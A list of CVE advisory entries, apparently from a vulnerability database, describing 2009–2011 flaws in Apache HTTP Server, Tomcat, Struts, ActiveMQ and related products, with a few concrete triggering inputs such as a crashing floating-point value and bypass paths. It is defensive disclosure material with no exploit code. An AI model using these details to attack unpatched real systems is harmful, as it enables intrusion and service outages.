| [CVE-2011-4905] Apache ActiveMQ before 5.6.0 allows remote attackers to cause a denial of service (file-descriptor exhaustion and broker crash or hang) by sending many openwire failover:tcp:// connection requests.
| [CVE-2011-4858] Apache Tomcat before 5.5.35, 6.x before 6.0.35, and 7.x before 7.0.23 computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters.
| [CVE-2011-4668] IBM Tivoli Netcool/Reporter 2.2 before 2.2.0.8 allows remote attackers to execute arbitrary code via vectors related to an unspecified CGI program used with the Apache HTTP Server.
| [CVE-2011-4449] actions/files/files.php in WikkaWiki 1.3.1 and 1.3.2, when INTRANET_MODE is enabled, supports file uploads for file extensions that are typically absent from an Apache HTTP Server TypesConfig file, which makes it easier for remote attackers to execute arbitrary PHP code by placing this code in a file whose name has multiple extensions, as demonstrated by a (1) .mm or (2) .vpp file.
| [CVE-2011-4415] The ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, does not restrict the size of values of environment variables, which allows local users to cause a denial of service (memory consumption or NULL pointer dereference) via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, related to (1) the "len +=" statement and (2) the apr_pcalloc function call, a different vulnerability than CVE-2011-3607.
| [CVE-2011-4317] The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an @ (at sign) character and a : (colon) character in invalid positions. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.
| [CVE-2011-3639] The mod_proxy module in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x before 2.2.18, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers by using the HTTP/0.9 protocol with a malformed URI containing an initial @ (at sign) character. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.
| [CVE-2011-3620] Apache Qpid 0.12 does not properly verify credentials during the joining of a cluster, which allows remote attackers to obtain access to the messaging functionality and job functionality of a cluster by leveraging knowledge of a cluster-username.
| [CVE-2011-3607] Integer overflow in the ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, allows local users to gain privileges via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, leading to a heap-based buffer overflow.
| [CVE-2011-3376] org/apache/catalina/core/DefaultInstanceManager.java in Apache Tomcat 7.x before 7.0.22 does not properly restrict ContainerServlets in the Manager application, which allows local users to gain privileges by using an untrusted web application to access the Manager application's functionality.
| [CVE-2011-3375] Apache Tomcat 6.0.30 through 6.0.33 and 7.x before 7.0.22 does not properly perform certain caching and recycling operations involving request objects, which allows remote attackers to obtain unintended read access to IP address and HTTP header information in opportunistic circumstances by reading TCP data.
| [CVE-2011-3368] The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an initial @ (at sign) character.
| [CVE-2011-3348] The mod_proxy_ajp module in the Apache HTTP Server before 2.2.21, when used with mod_proxy_balancer in certain configurations, allows remote attackers to cause a denial of service (temporary "error state" in the backend server) via a malformed HTTP request.
| [CVE-2011-3192] The byterange filter in the Apache HTTP Server 1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a denial of service (memory and CPU consumption) via a Range header that expresses multiple overlapping ranges, as exploited in the wild in August 2011, a different vulnerability than CVE-2007-0086.
| [CVE-2011-3190] Certain AJP protocol connector implementations in Apache Tomcat 7.0.0 through 7.0.20, 6.0.0 through 6.0.33, 5.5.0 through 5.5.33, and possibly other versions allow remote attackers to spoof AJP requests, bypass authentication, and obtain sensitive information by causing the connector to interpret a request body as a new request.
| [CVE-2011-2729] native/unix/native/jsvc-unix.c in jsvc in the Daemon component 1.0.3 through 1.0.6 in Apache Commons, as used in Apache Tomcat 5.5.32 through 5.5.33, 6.0.30 through 6.0.32, and 7.0.x before 7.0.20 on Linux, does not drop capabilities, which allows remote attackers to bypass read permissions for files via a request to an application.
| [CVE-2011-2712] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.18, when setAutomaticMultiWindowSupport is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters.
| [CVE-2011-2688] SQL injection vulnerability in mysql/mysql-auth.pl in the mod_authnz_external module 3.2.5 and earlier for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the user field.
| [CVE-2011-2526] Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.19, when sendfile is enabled for the HTTP APR or HTTP NIO connector, does not validate certain request attributes, which allows local users to bypass intended file access restrictions or cause a denial of service (infinite loop or JVM crash) by leveraging an untrusted web application.
| [CVE-2011-2516] Off-by-one error in the XML signature feature in Apache XML Security for C++ 1.6.0, as used in Shibboleth before 2.4.3 and possibly other products, allows remote attackers to cause a denial of service (crash) via a signature using a large RSA key, which triggers a buffer overflow.
| [CVE-2011-2481] Apache Tomcat 7.0.x before 7.0.17 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application. NOTE: this vulnerability exists because of a CVE-2009-0783 regression.
| [CVE-2011-2329] The rampart_timestamp_token_validate function in util/rampart_timestamp_token.c in Apache Rampart/C 1.3.0 does not properly calculate the expiration of timestamp tokens, which allows remote attackers to bypass intended access restrictions by leveraging an expired token, a different vulnerability than CVE-2011-0730.
| [CVE-2011-2204] Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.17, when the MemoryUserDatabase is used, creates log entries containing passwords upon encountering errors in JMX user creation, which allows local users to obtain sensitive information by reading a log file.
| [CVE-2011-2088] XWork 2.2.1 in Apache Struts 2.2.1, and OpenSymphony XWork in OpenSymphony WebWork, allows remote attackers to obtain potentially sensitive information about internal Java class paths via vectors involving an s:submit element and a nonexistent method, a different vulnerability than CVE-2011-1772.3.
| [CVE-2011-2087] Multiple cross-site scripting (XSS) vulnerabilities in component handlers in the javatemplates (aka Java Templates) plugin in Apache Struts 2.x before 2.2.3 allow remote attackers to inject arbitrary web script or HTML via an arbitrary parameter value to a .action URI, related to improper handling of value attributes in (1) FileHandler.java, (2) HiddenHandler.java, (3) PasswordHandler.java, (4) RadioHandler.java, (5) ResetHandler.java, (6) SelectHandler.java, (7) SubmitHandler.java, and (8) TextFieldHandler.java.
| [CVE-2011-1928] The fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library 1.4.3 and 1.4.4, and the Apache HTTP Server 2.2.18, allows remote attackers to cause a denial of service (infinite loop) via a URI that does not match unspecified types of wildcard patterns, as demonstrated by attacks against mod_autoindex in httpd when a /*/WEB-INF/ configuration pattern is used. NOTE: this issue exists because of an incorrect fix for CVE-2011-0419.
| [CVE-2011-1921] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x and 1.6.x before 1.6.17, when the SVNPathAuthz short_circuit option is disabled, does not properly enforce permissions for files that had been publicly readable in the past, which allows remote attackers to obtain sensitive information via a replay REPORT operation.
| [CVE-2011-1783] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x and 1.6.x before 1.6.17, when the SVNPathAuthz short_circuit option is enabled, allows remote attackers to cause a denial of service (infinite loop and memory consumption) in opportunistic circumstances by requesting data.
| [CVE-2011-1772] Multiple cross-site scripting (XSS) vulnerabilities in XWork in Apache Struts 2.x before 2.2.3, and OpenSymphony XWork in OpenSymphony WebWork, allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) an action name, (2) the action attribute of an s:submit element, or (3) the method attribute of an s:submit element.
| [CVE-2011-1752] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.17, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request for a baselined WebDAV resource, as exploited in the wild in May 2011.
| [CVE-2011-1610] Multiple SQL injection vulnerabilities in xmldirectorylist.jsp in the embedded Apache HTTP Server component in Cisco Unified Communications Manager (aka CUCM, formerly CallManager) 6.x before 6.1(5)su3, 7.x before 7.1(5)su4, 8.0 before 8.0(3a)su2, and 8.5 before 8.5(1)su1 allow remote attackers to execute arbitrary SQL commands via the (1) f, (2) l, or (3) n parameter, aka Bug ID CSCtj42064.
| [CVE-2011-1582] Apache Tomcat 7.0.12 and 7.0.13 processes the first request to a servlet without following security constraints that have been configured through annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088, CVE-2011-1183, and CVE-2011-1419.
| [CVE-2011-1571] Unspecified vulnerability in the XSL Content portlet in Liferay Portal Community Edition (CE) 5.x and 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote attackers to execute arbitrary commands via unknown vectors.
| [CVE-2011-1570] Cross-site scripting (XSS) vulnerability in Liferay Portal Community Edition (CE) 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote authenticated users to inject arbitrary web script or HTML via a message title, a different vulnerability than CVE-2004-2030.
| [CVE-2011-1503] The XSL Content portlet in Liferay Portal Community Edition (CE) 5.x and 6.x before 6.0.6 GA, when Apache Tomcat or Oracle GlassFish is used, allows remote authenticated users to read arbitrary (1) XSL and (2) XML files via a file:/// URL.
| [CVE-2011-1502] Liferay Portal Community Edition (CE) 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote authenticated users to read arbitrary files via an entity declaration in conjunction with an entity reference, related to an XML External Entity (aka XXE) issue.
| [CVE-2011-1498] Apache HttpClient 4.x before 4.1.1 in Apache HttpComponents, when used with an authenticating proxy server, sends the Proxy-Authorization header to the origin server, which allows remote web servers to obtain sensitive information by logging this header.
| [CVE-2011-1475] The HTTP BIO connector in Apache Tomcat 7.0.x before 7.0.12 does not properly handle HTTP pipelining, which allows remote attackers to read responses intended for other clients in opportunistic circumstances by examining the application data in HTTP packets, related to "a mix-up of responses for requests from different users."
| [CVE-2011-1419] Apache Tomcat 7.x before 7.0.11, when web.xml has no security constraints, does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088.
| [CVE-2011-1318] Memory leak in org.apache.jasper.runtime.JspWriterImpl.response in the JavaServer Pages (JSP) component in IBM WebSphere Application Server (WAS) before 7.0.0.15 allows remote attackers to cause a denial of service (memory consumption) by accessing a JSP page of an application that is repeatedly stopped and restarted.
| [CVE-2011-1184] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not have the expected countermeasures against replay attacks, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, related to lack of checking of nonce (aka server nonce) and nc (aka nonce-count or client nonce count) values.
| [CVE-2011-1183] Apache Tomcat 7.0.11, when web.xml has no login configuration, does not follow security constraints, which allows remote attackers to bypass intended access restrictions via HTTP requests to a meta-data complete web application. NOTE: this vulnerability exists because of an incorrect fix for CVE-2011-1088 and CVE-2011-1419.
| [CVE-2011-1176] The configuration merger in itk.c in the Steinar H. Gunderson mpm-itk Multi-Processing Module 2.2.11-01 and 2.2.11-02 for the Apache HTTP Server does not properly handle certain configuration sections that specify NiceValue but not AssignUserID, which might allow remote attackers to gain privileges by leveraging the root uid and root gid of an mpm-itk process.
| [CVE-2011-1088] Apache Tomcat 7.x before 7.0.10 does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application.
| [CVE-2011-1077] Multiple cross-site scripting (XSS) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
| [CVE-2011-1026] Multiple cross-site request forgery (CSRF) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to hijack the authentication of administrators.
| [CVE-2011-0715] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.16, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request that contains a lock token.
| [CVE-2011-0534] Apache Tomcat 7.0.0 through 7.0.6 and 6.0.0 through 6.0.30 does not enforce the maxHttpHeaderSize limit for requests involving the NIO HTTP connector, which allows remote attackers to cause a denial of service (OutOfMemoryError) via a crafted request.
| [CVE-2011-0533] Cross-site scripting (XSS) vulnerability in Apache Continuum 1.1 through 1.2.3.1, 1.3.6, and 1.4.0 Beta
| [CVE-2011-0419] Stack consumption vulnerability in the fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library before 1.4.3 and the Apache HTTP Server before 2.2.18, and in fnmatch.c in libc in NetBSD 5.1, OpenBSD 4.8, FreeBSD, Apple Mac OS X 10.6, Oracle Solaris 10, and Android, allows context-dependent attackers to cause a denial of service (CPU and memory consumption) via *? sequences in the first argument, as demonstrated by attacks against mod_autoindex in httpd.
| [CVE-2011-0013] Multiple cross-site scripting (XSS) vulnerabilities in the HTML Manager Interface in Apache Tomcat 5.5 before 5.5.32, 6.0 before 6.0.30, and 7.0 before 7.0.6 allow remote attackers to inject arbitrary web script or HTML, as demonstrated via the display-name tag.
| [CVE-2010-4644] Multiple memory leaks in rev_hunt.c in Apache Subversion before 1.6.15 allow remote authenticated users to cause a denial of service (memory consumption and daemon crash) via the -g option to the blame command.
| [CVE-2010-4539] The walk function in repos.c in the mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.15, allows remote authenticated users to cause a denial of service (NULL pointer dereference and daemon crash) via vectors that trigger the walking of SVNParentPath collections.
| [CVE-2010-4476] The Double.parseDouble method in Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier, as used in OpenJDK, Apache, JBossweb, and other products, allows remote attackers to cause a denial of service via a crafted string that triggers an infinite loop of estimations during conversion to a double-precision binary floating-point number, as demonstrated using 2.2250738585072012e-308.
| [CVE-2010-4455] Unspecified vulnerability in the Oracle HTTP Server component in Oracle Fusion Middleware 11.1.1.2 and 11.1.1.3 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Apache Plugin.
| [CVE-2010-4408] Apache Archiva 1.0 through 1.0.3, 1.1 through 1.1.4, 1.2 through 1.2.2, and 1.3 through 1.3.1 does not require entry of the administrator's password at the time of modifying a user account, which makes it easier for context-dependent attackers to gain privileges by leveraging a (1) unattended workstation or (2) cross-site request forgery (CSRF) vulnerability, a related issue to CVE-2010-3449.
| [CVE-2010-4312] The default configuration of Apache Tomcat 6.x does not include the HTTPOnly flag in a Set-Cookie header, which makes it easier for remote attackers to hijack a session via script access to a cookie.
| [CVE-2010-4172] Multiple cross-site scripting (XSS) vulnerabilities in the Manager application in Apache Tomcat 6.0.12 through 6.0.29 and 7.0.0 through 7.0.4 allow remote attackers to inject arbitrary web script or HTML via the (1) orderBy or (2) sort parameter to sessionsList.jsp, or unspecified input to (3) sessionDetail.jsp or (4) java/org/apache/catalina/manager/JspHelper.java, related to use of untrusted web applications.
| [CVE-2010-3872] The fcgid_header_bucket_read function in fcgid_bucket.c in the mod_fcgid module before 2.3.6 for the Apache HTTP Server does not use bytewise pointer arithmetic in certain circumstances, which has unspecified impact and attack vectors related to "untrusted FastCGI applications" and a "stack buffer overwrite."
| [CVE-2010-3863] Apache Shiro before 1.1.0, and JSecurity 0.9.x, does not canonicalize URI paths before comparing them to entries in the shiro.ini file, which allows remote attackers to bypass intended access restrictions via a crafted request, as demonstrated by the /./account/index.jsp URI.
| [CVE-2010-3854] Multiple cross-site scripting (XSS) vulnerabilities in the web administration interface (aka Futon) in Apache CouchDB 0.8.0 through 1.0.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
| [CVE-2010-3718] Apache Tomcat 7.0.0 through 7.0.3, 6.0.x, and 5.5.x, when running within a SecurityManager, does not make the ServletContext attribute read-only, which allows local web applications to read or write files outside of the intended working directory, as demonstrated using a directory traversal attack.
| [CVE-2010-3449] Cross-site request forgery (CSRF) vulnerability in Redback before 1.2.4, as used in Apache Archiva 1.0 through 1.0.3, 1.1 through 1.1.4, 1.2 through 1.2.2, and 1.3 through 1.3.1
| [CVE-2010-3315] authz.c in the mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x before 1.5.8 and 1.6.x before 1.6.13, when SVNPathAuthz short_circuit is enabled, does not properly handle a named repository as a rule scope, which allows remote authenticated users to bypass intended access restrictions via svn commands.
| [CVE-2010-3083] sys/ssl/SslSocket.cpp in qpidd in Apache Qpid, as used in Red Hat Enterprise MRG before 1.2.2 and other products, when SSL is enabled, allows remote attackers to cause a denial of service (daemon outage) by connecting to the SSL port but not participating in an SSL handshake.
| [CVE-2010-2952] Apache Traffic Server before 2.0.1, and 2.1.x before 2.1.2-unstable, does not properly choose DNS source ports and transaction IDs, and does not properly use DNS query fields to validate responses, which makes it easier for man-in-the-middle attackers to poison the internal DNS cache via a crafted response.
| [CVE-2010-2791] mod_proxy in httpd in Apache HTTP Server 2.2.9, when running on Unix, does not close the backend connection if a timeout occurs when reading a response from a persistent connection, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request. NOTE: this is the same issue as CVE-2010-2068, but for a different OS and set of affected versions.
| [CVE-2010-2375] Package/Privilege: Plugins for Apache, Sun and IIS web servers Unspecified vulnerability in the WebLogic Server component in Oracle Fusion Middleware 7.0 SP7, 8.1 SP6, 9.0, 9.1, 9.2 MP3, 10.0 MP2, 10.3.2, and 10.3.3 allows remote attackers to affect confidentiality and integrity, related to IIS.
| [CVE-2010-2234] Cross-site request forgery (CSRF) vulnerability in Apache CouchDB 0.8.0 through 0.11.0 allows remote attackers to hijack the authentication of administrators for direct requests to an installation URL.
4903| [CVE-2010-2234] Cross-site request forgery (CSRF) vulnerability in Apache CouchDB 0.8.0 through 0.11.0 allows remote attackers to hijack the authentication of administrators for direct requests to an installation URL.
4904| [CVE-2010-2227] Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27, and 7.0.0 beta does not properly handle an invalid Transfer-Encoding header, which allows remote attackers to cause a denial of service (application outage) or obtain sensitive information via a crafted header that interferes with "recycling of a buffer."
4905| [CVE-2010-2103] Cross-site scripting (XSS) vulnerability in axis2-admin/axis2-admin/engagingglobally in the administration console in Apache Axis2/Java 1.4.1, 1.5.1, and possibly other versions, as used in SAP Business Objects 12, 3com IMC, and possibly other products, allows remote attackers to inject arbitrary web script or HTML via the modules parameter. NOTE: some of these details are obtained from third party information.
4906| [CVE-2010-2086] Apache MyFaces 1.1.7 and 1.2.8, as used in IBM WebSphere Application Server and other applications, does not properly handle an unencrypted view state, which allows remote attackers to conduct cross-site scripting (XSS) attacks or execute arbitrary Expression Language (EL) statements via vectors that involve modifying the serialized view object.
4907| [CVE-2010-2076] Apache CXF 2.0.x before 2.0.13, 2.1.x before 2.1.10, and 2.2.x before 2.2.9, as used in Apache ServiceMix, Apache Camel, Apache Chemistry, Apache jUDDI, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to samples/wsdl_first_pure_xml, a similar issue to CVE-2010-1632.
| [CVE-2010-2068] mod_proxy_http.c in mod_proxy_http in the Apache HTTP Server 2.2.9 through 2.2.15, 2.3.4-alpha, and 2.3.5-alpha on Windows, NetWare, and OS/2, in certain configurations involving proxy worker pools, does not properly detect timeouts, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request.
| [CVE-2010-2057] shared/util/StateUtils.java in Apache MyFaces 1.1.x before 1.1.8, 1.2.x before 1.2.9, and 2.0.x before 2.0.1 uses an encrypted View State without a Message Authentication Code (MAC), which makes it easier for remote attackers to perform successful modifications of the View State via a padding oracle attack.
| [CVE-2010-1632] Apache Axis2 before 1.5.2, as used in IBM WebSphere Application Server (WAS) 7.0 through 7.0.0.12, IBM Feature Pack for Web Services 6.1.0.9 through 6.1.0.32, IBM Feature Pack for Web 2.0 1.0.1.0, Apache Synapse, Apache ODE, Apache Tuscany, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to the Synapse SimpleStockQuoteService.
| [CVE-2010-1623] Memory leak in the apr_brigade_split_line function in buckets/apr_brigade.c in the Apache Portable Runtime Utility library (aka APR-util) before 1.3.10, as used in the mod_reqtimeout module in the Apache HTTP Server and other software, allows remote attackers to cause a denial of service (memory consumption) via unspecified vectors related to the destruction of an APR bucket.
| [CVE-2010-1587] The Jetty ResourceHandler in Apache ActiveMQ 5.x before 5.3.2 and 5.4.x before 5.4.0 allows remote attackers to read JSP source code via a // (slash slash) initial substring in a URI for (1) admin/index.jsp, (2) admin/queues.jsp, or (3) admin/topics.jsp.
| [CVE-2010-1452] The (1) mod_cache and (2) mod_dav modules in the Apache HTTP Server 2.2.x before 2.2.16 allow remote attackers to cause a denial of service (process crash) via a request that lacks a path.
| [CVE-2010-1325] Cross-site request forgery (CSRF) vulnerability in the apache2-slms package in SUSE Lifecycle Management Server (SLMS) 1.0 on SUSE Linux Enterprise (SLE) 11 allows remote attackers to hijack the authentication of unspecified victims via vectors related to improper parameter quoting. NOTE: some sources report that this is a vulnerability in a product named "Apache SLMS," but that is incorrect.
| [CVE-2010-1244] Cross-site request forgery (CSRF) vulnerability in createDestination.action in Apache ActiveMQ before 5.3.1 allows remote attackers to hijack the authentication of unspecified victims for requests that create queues via the JMSDestination parameter in a queue action.
| [CVE-2010-1157] Apache Tomcat 5.5.0 through 5.5.29 and 6.0.0 through 6.0.26 might allow remote attackers to discover the server's hostname or IP address by sending a request for a resource that requires (1) BASIC or (2) DIGEST authentication, and then reading the realm field in the WWW-Authenticate header in the reply.
| [CVE-2010-1151] Race condition in the mod_auth_shadow module for the Apache HTTP Server allows remote attackers to bypass authentication, and read and possibly modify data, via vectors related to improper interaction with an external helper application for validation of credentials.
| [CVE-2010-0684] Cross-site scripting (XSS) vulnerability in createDestination.action in Apache ActiveMQ before 5.3.1 allows remote authenticated users to inject arbitrary web script or HTML via the JMSDestination parameter in a queue action.
| [CVE-2010-0434] The ap_read_request function in server/protocol.c in the Apache HTTP Server 2.2.x before 2.2.15, when a multithreaded MPM is used, does not properly handle headers in subrequests in certain circumstances involving a parent request that has a body, which might allow remote attackers to obtain sensitive information via a crafted request that triggers access to memory locations associated with an earlier request.
| [CVE-2010-0432] Multiple cross-site scripting (XSS) vulnerabilities in the Apache Open For Business Project (aka OFBiz) 09.04 and earlier, as used in Opentaps, Neogia, and Entente Oya, allow remote attackers to inject arbitrary web script or HTML via (1) the productStoreId parameter to control/exportProductListing, (2) the partyId parameter to partymgr/control/viewprofile (aka partymgr/control/login), (3) the start parameter to myportal/control/showPortalPage, (4) an invalid URI beginning with /facility/control/ReceiveReturn (aka /crmsfa/control/ReceiveReturn or /cms/control/ReceiveReturn), (5) the contentId parameter (aka the entityName variable) to ecommerce/control/ViewBlogArticle, (6) the entityName parameter to webtools/control/FindGeneric, or the (7) subject or (8) content parameter to an unspecified component under ecommerce/control/contactus.
| [CVE-2010-0425] modules/arch/win32/mod_isapi.c in mod_isapi in the Apache HTTP Server 2.0.37 through 2.0.63, 2.2.0 through 2.2.14, and 2.3.x before 2.3.7, when running on Windows, does not ensure that request processing is complete before calling isapi_unload for an ISAPI .dll module, which allows remote attackers to execute arbitrary code via unspecified vectors related to a crafted request, a reset packet, and "orphaned callback pointers."
| [CVE-2010-0408] The ap_proxy_ajp_request function in mod_proxy_ajp.c in mod_proxy_ajp in the Apache HTTP Server 2.2.x before 2.2.15 does not properly handle certain situations in which a client sends no request body, which allows remote attackers to cause a denial of service (backend server outage) via a crafted request, related to use of a 500 error code instead of the appropriate 400 error code.
| [CVE-2010-0390] Unrestricted file upload vulnerability in maxImageUpload/index.php in PHP F1 Max's Image Uploader 1.0, when Apache is not configured to handle the mime-type for files with pjpeg or jpeg extensions, allows remote attackers to execute arbitrary code by uploading a file with a pjpeg or jpeg extension, then accessing it via a direct request to the file in original/. NOTE: some of these details are obtained from third party information.
| [CVE-2010-0219] Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.
| [CVE-2010-0010] Integer overflow in the ap_proxy_send_fb function in proxy/proxy_util.c in mod_proxy in the Apache HTTP Server before 1.3.42 on 64-bit platforms allows remote origin servers to cause a denial of service (daemon crash) or possibly execute arbitrary code via a large chunk size that triggers a heap-based buffer overflow.
| [CVE-2010-0009] Apache CouchDB 0.8.0 through 0.10.1 allows remote attackers to obtain sensitive information by measuring the completion time of operations that verify (1) hashes or (2) passwords.
| [CVE-2009-5120] The default configuration of Apache Tomcat in Websense Manager in Websense Web Security 7.0 and Web Filter 7.0 allows connections to TCP port 1812 from arbitrary source IP addresses, which makes it easier for remote attackers to conduct cross-site scripting (XSS) attacks via UTF-7 text to the 404 error page of a Project Woodstock service on this port.
| [CVE-2009-5119] The default configuration of Apache Tomcat in Websense Manager in Websense Web Security 7.0 and Web Filter 7.0 enables weak SSL ciphers in conf/server.xml, which makes it easier for remote attackers to obtain sensitive information by sniffing the network and then conducting a brute-force attack against encrypted session data.
| [CVE-2009-5006] The SessionAdapter::ExchangeHandlerImpl::checkAlternate function in broker/SessionAdapter.cpp in the C++ Broker component in Apache Qpid before 0.6, as used in Red Hat Enterprise MRG before 1.3 and other products, allows remote authenticated users to cause a denial of service (NULL pointer dereference, daemon crash, and cluster outage) by attempting to modify the alternate of an exchange.
| [CVE-2009-5005] The Cluster::deliveredEvent function in cluster/Cluster.cpp in Apache Qpid, as used in Red Hat Enterprise MRG before 1.3 and other products, allows remote attackers to cause a denial of service (daemon crash and cluster outage) via invalid AMQP data.
| [CVE-2009-4355] Memory leak in the zlib_stateful_finish function in crypto/comp/c_zlib.c in OpenSSL 0.9.8l and earlier and 1.0.0 Beta through Beta 4 allows remote attackers to cause a denial of service (memory consumption) via vectors that trigger incorrect calls to the CRYPTO_cleanup_all_ex_data function, as demonstrated by use of SSLv3 and PHP with the Apache HTTP Server, a related issue to CVE-2008-1678.
| [CVE-2009-4269] The password hash generation algorithm in the BUILTIN authentication functionality for Apache Derby before 10.6.1.0 performs a transformation that reduces the size of the set of inputs to SHA-1, which produces a small search space that makes it easier for local and possibly remote attackers to crack passwords by generating hash collisions, related to password substitution.
| [CVE-2009-3923] The VirtualBox 2.0.8 and 2.0.10 web service in Sun Virtual Desktop Infrastructure (VDI) 3.0 does not require authentication, which allows remote attackers to obtain unspecified access via vectors involving requests to an Apache HTTP Server.
| [CVE-2009-3890] Unrestricted file upload vulnerability in the wp_check_filetype function in wp-includes/functions.php in WordPress before 2.8.6, when a certain configuration of the mod_mime module in the Apache HTTP Server is enabled, allows remote authenticated users to execute arbitrary code by posting an attachment with a multiple-extension filename, and then accessing this attachment via a direct request to a wp-content/uploads/ pathname, as demonstrated by a .php.jpg filename.
| [CVE-2009-3843] HP Operations Manager 8.10 on Windows contains a "hidden account" in the XML file that specifies Tomcat users, which allows remote attackers to conduct unrestricted file upload attacks, and thereby execute arbitrary code, by using the org.apache.catalina.manager.HTMLManagerServlet class to make requests to manager/html/upload.
| [CVE-2009-3821] Cross-site scripting (XSS) vulnerability in the Apache Solr Search (solr) extension 1.0.0 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
| [CVE-2009-3555] The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS) 3.12.4 and earlier, multiple Cisco products, and other products, does not properly associate renegotiation handshakes with an existing connection, which allows man-in-the-middle attackers to insert data into HTTPS sessions, and possibly other types of sessions protected by TLS or SSL, by sending an unauthenticated request that is processed retroactively by a server in a post-renegotiation context, related to a "plaintext injection" attack, aka the "Project Mogul" issue.
| [CVE-2009-3548] The Windows installer for Apache Tomcat 6.0.0 through 6.0.20, 5.5.0 through 5.5.28, and possibly earlier versions uses a blank default password for the administrative user, which allows remote attackers to gain privileges.
| [CVE-2009-3250] The saveForwardAttachments procedure in the Compose Mail functionality in vtiger CRM 5.0.4 allows remote authenticated users to execute arbitrary code by composing an e-mail message with an attachment filename ending in (1) .php in installations based on certain Apache HTTP Server configurations, (2) .php. on Windows, or (3) .php/ on Linux, and then making a direct request to a certain pathname under storage/.
| [CVE-2009-3095] The mod_proxy_ftp module in the Apache HTTP Server allows remote attackers to bypass intended access restrictions and send arbitrary commands to an FTP server via vectors related to the embedding of these commands in the Authorization HTTP header, as demonstrated by a certain module in VulnDisco Pack Professional 8.11.
